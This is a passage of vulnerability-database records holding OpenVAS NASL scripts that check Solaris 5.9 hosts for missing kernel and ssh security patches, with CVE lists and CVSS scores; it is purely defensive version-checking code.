"scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855768", "href": "http://plugins.openvas.org/nasl.php?oid=855768", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122301-44\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855768);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122301-44\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for Kernel 122301-44\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122301-44-1\");\n\n script_summary(\"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"122301-44\", package:\"SUNWatfsu SUNWarc SUNWrsg SUNWcstl SUNWsshdu SUNWcar.i SUNWrsgk SUNWcsu SUNWnfscr SUNWnfssu SUNWaudit SUNWcsr SUNWsshdr SUNWmdb SUNWvolu SUNWudfr SUNWnfscu SUNWsshcu SUNWatfsr SUNWsshu SUNWcsl SUNWsshr SUNWnfssr SUNWhea\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:20", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122300-40", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855612", "href": "http://plugins.openvas.org/nasl.php?oid=855612", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122300-40\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855612);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122300-40\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for Kernel 122300-40\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122300-40-1\");\n\n script_summary(\"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"122300-40\", package:\"SUNWsshcu SUNWcar.us SUNWarc SUNWcar.m SUNWpdx SUNWmdb SUNWaudit SUNWsshdu FJSVhea SUNWcsl SUNWsshdr SUNWefcx.u SUNWsshr SUNWdrr.u SUNWdrrx.us SUNWcsxu SUNWcarx.us SUNWpiclu SUNWmdbx SUNWvolr SUNWdrr.us SUNWcsr SUNWefcx.us SUNWpd SUNWhea SUNWcslx SUNWcstlx SUNWcarx.u SUNWsshu SUNWcsu SUNWcar.u SUNWdrcrx.u SUNWdrrx.u SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T11:11:14", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2010-02-03T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122301-48", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483", "CVE-2006-0225"], "modified": "2017-12-12T00:00:00", "id": "OPENVAS:855853", "href": "http://plugins.openvas.org/nasl.php?oid=855853", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122301-48\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855853);\n script_version(\"$Revision: 8082 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-12 07:31:24 +0100 (Tue, 12 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-03 13:24:57 +0100 (Wed, 03 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122301-48\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-0225\");\n script_name(\"Solaris Update for Kernel 122301-48\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122301-48-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"122301-48\", package:\"SUNWsshcu SUNWcar.i SUNWatfsu SUNWarc SUNWmdb SUNWaudit SUNWsshdu SUNWnfssu SUNWcsl SUNWrsg SUNWrsgk SUNWsshdr SUNWvolu SUNWsshr SUNWnfssr SUNWcsr SUNWhea SUNWatfsr SUNWsshu SUNWcsu SUNWnfscu SUNWnfscr SUNWcstl SUNWudfr\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:19", "description": "Check for the Version of /usr/bin/ssh", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for /usr/bin/ssh 114356-18", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483", "CVE-2006-0225"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855023", "href": "http://plugins.openvas.org/nasl.php?oid=855023", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for /usr/bin/ssh 114356-18\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"/usr/bin/ssh on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n /usr/bin/ssh\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855023);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:24:08 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114356-18\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-0225\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for /usr/bin/ssh 114356-18\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114356-18-1\");\n\n script_summary(\"Check for the Version of /usr/bin/ssh\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"114356-18\", package:\"SUNWsshcu SUNWsshu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:12", "description": "Check for the Version of /usr/bin/ssh", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for /usr/bin/ssh 114357-17", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483", "CVE-2006-0225"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855030", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855030", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for /usr/bin/ssh 114357-17\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"/usr/bin/ssh on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n /usr/bin/ssh\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855030\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:24:08 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114357-17\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-0225\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for /usr/bin/ssh 114357-17\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114357-17-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of /usr/bin/ssh\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"114357-17\", package:\"SUNWsshcu SUNWsshu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:14", "description": "Check for the Version of /usr/bin/ssh", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for /usr/bin/ssh 114357-17", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483", "CVE-2006-0225"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855030", "href": "http://plugins.openvas.org/nasl.php?oid=855030", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for /usr/bin/ssh 114357-17\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"/usr/bin/ssh on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n /usr/bin/ssh\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855030);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:24:08 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114357-17\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-0225\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for /usr/bin/ssh 114357-17\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114357-17-1\");\n\n script_summary(\"Check for the Version of /usr/bin/ssh\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"114357-17\", package:\"SUNWsshcu SUNWsshu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:58", "description": "Check for the Version of /usr/bin/ssh", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "Solaris Update for /usr/bin/ssh 114357-18", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483", "CVE-2006-0225"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855771", "href": "http://plugins.openvas.org/nasl.php?oid=855771", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for /usr/bin/ssh 114357-18\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"/usr/bin/ssh on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n /usr/bin/ssh\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855771);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114357-18\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-0225\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for /usr/bin/ssh 114357-18\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114357-18-1\");\n\n script_summary(\"Check for the Version of /usr/bin/ssh\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"114357-18\", package:\"SUNWsshcu SUNWsshu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:42", "description": "Check for the Version of /usr/bin/ssh", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "Solaris Update for /usr/bin/ssh 114357-18", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483", "CVE-2006-0225"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855771", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855771", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for /usr/bin/ssh 114357-18\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"/usr/bin/ssh on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n /usr/bin/ssh\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855771\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114357-18\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-0225\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for /usr/bin/ssh 114357-18\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114357-18-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of /usr/bin/ssh\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"114357-18\", package:\"SUNWsshcu SUNWsshu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:49", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for kernel 127128-11", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2005-2969", "CVE-2006-4339", "CVE-2007-5135"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855192", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855192", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kernel 127128-11\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT 